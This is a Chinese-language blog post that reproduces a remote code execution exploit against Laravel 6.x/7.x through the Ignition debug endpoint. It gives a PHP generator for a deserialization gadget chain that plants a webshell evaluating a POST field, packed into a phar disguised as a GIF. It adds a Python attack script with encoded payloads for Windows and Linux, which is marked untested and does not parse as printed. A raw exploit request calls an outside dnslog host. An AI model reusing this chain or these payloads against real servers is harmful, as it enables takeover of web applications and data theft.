Laravel 6.x/7.x的一条执行代码的反序列化利用链

作者: print("") 分类: 漏洞复现 发布时间: 2021-06-18 14:48

这两天碰到了一个Laravel  的环境。死活不行。最后还是奶子哥牛逼。

代码如下:

<?php
// Affected versions were not tested systematically; this worked on a local 6.x install and on the 7.x target.
// Defender note: the objects built in this namespace only matter if attacker-controlled bytes reach
// unserialize() or a phar:// stream wrapper. NOTE(review): Mockery is presumably installed only as a
// development dependency; confirm production images are built with `composer install --no-dev`.
namespace Mockery\Generator{
    // Stand-in declared under the library's class name so that serialize() emits that name;
    // only the property value assigned in the constructor ends up in the output.
    class MockConfiguration{
        protected $name;

        public function __construct(){
            $this->name = 'a';
        }
    }
    // Stand-in that pairs a MockConfiguration with a string of PHP source.
    class MockDefinition{
        protected $config;
        protected $code;

        public function __construct(){
            $this->config = new MockConfiguration;
            // The stored source is a one-line snippet that eval()s the POST field 'aa'.
            $this->code = "<?php eval(\$_POST['aa']);?>";
        }
    }
}

namespace Mockery\Loader{
    // Empty stand-in: it has no properties, so only the class name is carried into the serialized data.
    // NOTE(review): the behaviour of the real EvalLoader lives in the Mockery library, not in this listing.
    class EvalLoader{

    }
}

namespace Illuminate\Auth{
    use Mockery\Loader\EvalLoader;
    use Mockery\Generator\MockDefinition;
    // Stand-in declared under the framework's RequestGuard name with all three properties pre-filled.
    // NOTE(review): how the real class uses $callback, $request and $provider is framework code that is
    // not shown here; the values below are what a defender would see inside a captured payload.
    class RequestGuard{
        protected $callback;
        protected $request;
        protected $provider;

        public function __construct(){
            // A function name given as a string instead of a closure.
            $this->callback = 'call_user_func_array';
            // A PHP callable array: [EvalLoader instance, 'load'].
            $this->request = array(new EvalLoader, 'load');
            // A one-element array holding the MockDefinition.
            $this->provider = array(new MockDefinition);
        }
    }
}

namespace Illuminate\Validation{
    // Stand-in exposing only the public $extensions map; its single entry maps the
    // empty-string key to the function name 'call_user_func'.
    class Validator{
        public $extensions = [""=>"call_user_func"];
    }
}

namespace Illuminate\Broadcasting{
    use Illuminate\Validation\Validator;
    use Illuminate\Auth\RequestGuard;
    // Outermost object of the chain; this is the one handed to the serializer by the script at the end of the listing.
    // NOTE(review): presumably the real class acts on $events/$event when the object is destroyed;
    // that code is in the framework and is not visible in this listing.
    class PendingBroadcast{
        protected $events;
        protected $event;

        public function __construct(){
            // $events is the Validator stand-in rather than an event dispatcher.
            $this->events = new Validator();
            // $event is a callable array: [RequestGuard instance, 'user'].
            $this->event = array(new RequestGuard, 'user');
        }
    }
}
namespace {
    use Illuminate\Broadcasting\PendingBroadcast;
    // Alternative output kept by the author: the plain serialized object, base64-encoded.
    // echo base64_encode(serialize(new PendingBroadcast()));
    $a = new PendingBroadcast;
    // Build a phar archive whose metadata slot holds the object; Phar serializes metadata when writing.
    $phar = new \Phar("2.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ");
    $phar->setMetadata($a);
    // One dummy entry, so the archive has a member that a phar:// path can name.
    $phar->addFromString("test.txt","123");
    $phar->stopBuffering();
    // The archive is renamed to an image extension and printed as base64.
    // Defender note: phar archives are recognised by content, not by file name, so extension-based
    // upload filters do not help; keep user-controlled paths away from filesystem functions that
    // honour stream wrappers, and never feed untrusted data to unserialize().
    rename("2.phar","shell.gif");
    echo base64_encode(file_get_contents("shell.gif"));
}
?>

把最开始的脚本改造一下【未测试】

# -*- coding: utf-8 -*- 
import requests,json
import sys,re
# Local intercepting-proxy address; no request in the visible code passes it on.
proxies = {"http": "127.0.0.1:8080"}

# Headers shared by every POST helper: a fixed browser User-Agent and a JSON content type.
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
    "Content-Type": "application/json",
}


def clearlog(url):
    """POST a solution request whose ``viewFile`` is a php://filter write chain.

    The chain (iconv utf-8 to utf-16be, quoted-printable encode, iconv back,
    base64 decode) is pointed at ``../storage/logs/laravel.log``. The
    ``requests`` response is returned unchanged.

    Defender note: a ``viewFile`` value that starts with ``php://`` or
    ``phar://`` has no legitimate use on this endpoint and is worth alerting
    on or blocking at the proxy.
    """
    payload = {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
            "variableName": "username",
            "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log",
        },
    }
    body = json.dumps(payload, indent=1)
    response = requests.post(url, headers=header, data=body)
    return response

def AA(url):
    """POST a solution request whose ``viewFile`` is the literal string ``AA``.

    Returns the ``requests`` response; the ``__main__`` block only continues
    when this call answers with HTTP 500.
    """
    payload = {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
            "variableName": "username",
            "viewFile": "AA",
        },
    }
    body = json.dumps(payload, indent=1)
    response = requests.post(url, headers=header, data=body)
    return response

def sendpayloadwindows(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "aaaaaaaaa=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=34=00=41=00=67=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=78=00=66=00=64=00=58=00=4E=00=6C=00=63=00=6C=00=39=00=6D=00=64=00=57=00=35=00=6A=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=
00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=58=00=56=00=30=00=61=00=46=00=78=00=53=00=5A=00=58=00=46=00=31=00=5A=00=58=00=4E=00=30=00=52=00=33=00=56=00=68=00=63=00=6D=00=51=00=69=00=4F=00=6A=00=4D=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=45=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=68=00=62=00=47=00=78=00=69=00=59=00=57=00=4E=00=72=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=6A=00=59=00=57=00=78=00=73=00=58=00=33=00=56=00=7A=00=5A=00=58=00=4A=00=66=00=5A=00=6E=00=56=00=75=00=59=00=31=00=39=00=68=00=63=00=6E=00=4A=00=68=00=65=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=4A=00=63=00=52=00=58=00=5A=00=68=00=62=00=45=00=78=00=76=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=36=00=4D=00=44=00=70=00=37=00=66=00=57=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=78=00=76=00=59=00=57=00=51=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=45=00=78=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=32=00=61=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=4A=00=63=00=54=00=57=00=39=00=6A=00=61=00=30=00=52=00=6C=00=5A=00=6D=00=6C=00=75=00=61=00=58=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=31=00=4F=00=69=00=4A=00
=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=51=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=64=00=58=00=4A=00=68=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=75=00=59=00=57=00=31=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6D=00=45=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=76=00=5A=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=63=00=36=00=49=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=47=00=56=00=32=00=59=00=57=00=77=00=6F=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=79=00=64=00=68=00=59=00=53=00=64=00=64=00=4B=00=54=00=73=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=6F=00=69=00=64=00=58=00=4E=00=6C=00=63=00=69=00=49=00=37=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=44=00=41=00=41=00=41=00=41=00=4B=00=55=00=48=00=4D=00=59=00=41=00=4D=00=41=00=41=00=41=00=44=00=53=00=59=00=30=00=69=00=49=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=78=00=4D=00=6A=00=50=00=63=00=54=00=66=00=35=00=51=00=4E=00=74=00=67=00=58=00=79=00=71=00=43=00=47=00=32=00=61=00=41=00=66=00=30=00=49=00=44=00=30=00=38=00=78=00=6C=00=6D=00=42=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00" }
 }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def sendpayloadlinux(url):
    data={
 "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "aaaaaaaaa=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=34=00=41=00=67=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=43=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=78=00=66=00=64=00=58=00=4E=00=6C=00=63=00=6C=00=39=00=6D=00=64=00=57=00=35=00=6A=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=
00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=58=00=56=00=30=00=61=00=46=00=78=00=53=00=5A=00=58=00=46=00=31=00=5A=00=58=00=4E=00=30=00=52=00=33=00=56=00=68=00=63=00=6D=00=51=00=69=00=4F=00=6A=00=4D=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=45=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=68=00=62=00=47=00=78=00=69=00=59=00=57=00=4E=00=72=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=6A=00=59=00=57=00=78=00=73=00=58=00=33=00=56=00=7A=00=5A=00=58=00=4A=00=66=00=5A=00=6E=00=56=00=75=00=59=00=31=00=39=00=68=00=63=00=6E=00=4A=00=68=00=65=00=53=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=4A=00=63=00=52=00=58=00=5A=00=68=00=62=00=45=00=78=00=76=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=36=00=4D=00=44=00=70=00=37=00=66=00=57=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=78=00=76=00=59=00=57=00=51=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=45=00=78=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=32=00=61=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=6A=00=61=00=32=00=56=00=79=00=65=00=56=00=78=00=48=00=5A=00=57=00=35=00=6C=00=63=00=6D=00=46=00=30=00=62=00=33=00=4A=00=63=00=54=00=57=00=39=00=6A=00=61=00=30=00=52=00=6C=00=5A=00=6D=00=6C=00=75=00=61=00=58=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=31=00=4F=00=69=00=4A=00
=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=51=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=64=00=58=00=4A=00=68=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=75=00=59=00=57=00=31=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6D=00=45=00=69=00=4F=00=33=00=31=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4E=00=76=00=5A=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=63=00=36=00=49=00=6A=00=77=00=2F=00=63=00=47=00=68=00=77=00=49=00=47=00=56=00=32=00=59=00=57=00=77=00=6F=00=4A=00=46=00=39=00=51=00=54=00=31=00=4E=00=55=00=57=00=79=00=64=00=68=00=59=00=53=00=64=00=64=00=4B=00=54=00=73=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=44=00=6F=00=69=00=64=00=58=00=4E=00=6C=00=63=00=69=00=49=00=37=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=44=00=41=00=41=00=41=00=41=00=4B=00=55=00=48=00=4D=00=59=00=41=00=4D=00=41=00=41=00=41=00=44=00=53=00=59=00=30=00=69=00=49=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=78=00=4D=00=6A=00=50=00=63=00=54=00=66=00=35=00=51=00=4E=00=74=00=67=00=58=00=79=00=71=00=43=00=47=00=32=00=61=00=41=00=66=00=30=00=49=00=44=00=30=00=38=00=78=00=6C=00=6D=00=42=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00" }
}
    req=requests.post(url,headers=header,data=json.dumps(data,indent=1))
    return req

def filterlog(url):
    """POST a solution request that runs a decoding php://filter chain over the log file.

    The chain (quoted-printable decode, iconv utf-16le to utf-8, base64
    decode) targets ``../storage/logs/laravel.log``. Returns the ``requests``
    response; the ``__main__`` block expects HTTP 200 from this step.

    Defender note: unexpected rewrites of ``storage/logs/laravel.log`` (size
    collapsing, binary content) are a file-integrity signal for this activity.
    """
    payload = {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
            "variableName": "username",
            "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log",
        },
    }
    body = json.dumps(payload, indent=1)
    response = requests.post(url, headers=header, data=body)
    return response
 

def phar(url,path):
    """POST a solution request whose ``viewFile`` is a phar:// path with backslash separators.

    ``path`` is the application root (the parameter shadows the module-level
    ``path`` function inside this body). Returns the ``requests`` response.

    Defender note: a ``phar://`` wrapper pointing into ``storage/logs`` should
    never appear in request parameters.
    """
    # "\s" is not a recognised escape, so Python keeps the backslash as written
    # (newer interpreters emit a warning for it).
    target = "phar://"+path+"\storage\\logs\\laravel.log\\test.txt"
    payload = {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
            "variableName": "username",
            "viewFile": target,
        },
    }
    body = json.dumps(payload, indent=1)
    response = requests.post(url, headers=header, data=body)
    return response

def pharl(url,path):
    """POST a solution request whose ``viewFile`` is a phar:// path with forward slashes.

    Same request as ``phar`` but with ``/`` separators. ``path`` is the
    application root (the parameter shadows the module-level ``path``
    function inside this body). Returns the ``requests`` response.
    """
    target = "phar://"+path+"/storage/logs/laravel.log/test.txt"
    payload = {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
            "variableName": "username",
            "viewFile": target,
        },
    }
    body = json.dumps(payload, indent=1)
    response = requests.post(url, headers=header, data=body)
    return response

def path(url):
    """GET ``url`` and return the directory prefix found in front of ``vendor``.

    The pattern looks for ``#<digits> <prefix>`` followed by a slash or
    backslash and ``vendor``, and returns ``<prefix>`` from the first match;
    presumably this is a stack-trace frame in the error page. An
    ``IndexError`` is raised when nothing matches.

    Defender note: absolute paths only leak this way when detailed error
    pages are served to clients.
    """
    page = requests.get(url).text
    frames = re.findall(r'(\#\d*\ (.*)(?:\/|\\)vendor)', page)
    first = frames[0]
    return first[1]

if __name__=='__main__':
	# Driver: takes the base URL from argv and appends the solution-runner route.
	# Defender note: this route belongs to the debug error page and should not be reachable in
	# production (APP_DEBUG=false, development dependencies not installed, component kept patched).
	# NOTE(review): as published, the two innermost `if` statements (the phar()/pharl() checks)
	# have no body, so this block does not parse; the author marks the script as untested.
	url=sys.argv[1]+"/_ignition/execute-solution"
	# The same log-rewrite request is sent five times in a row.
	clearlog(url)
	clearlog(url)
	clearlog(url)
	clearlog(url)
	clearlog(url)
	# Each later step is gated on the HTTP status of the previous one.
	if(AA(url).status_code==500):
		# A ':' in the leaked path is taken to mean a Windows drive letter.
		if(":" in path(url)):
			print("windows")
			if(sendpayloadwindows(url).status_code==500):
				if(filterlog(url).status_code==200):
					if(phar(url,path(url)).status_code==500):
		# No ':' in the leaked path: treated as a Unix-style root.
		if(":" not in path(url)):
			print("linux")
			if(sendpayloadlinux(url).status_code==500):
				if(filterlog(url).status_code==200):
					if(pharl(url,path(url)).status_code==500):

然后去请求当前的phar文件 就可以成功代码执行

POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.10.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 228

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=username&parameters[viewFile]=%20phar:///{phar_path}/logs/laravel.log/test.txt&&aa=file_get_contents('http://kj4oal.dnslog.cn');

奶子哥是真的牛逼

参考链接:https://articles.zsxq.com/id_m5e2g2kw1cld.html
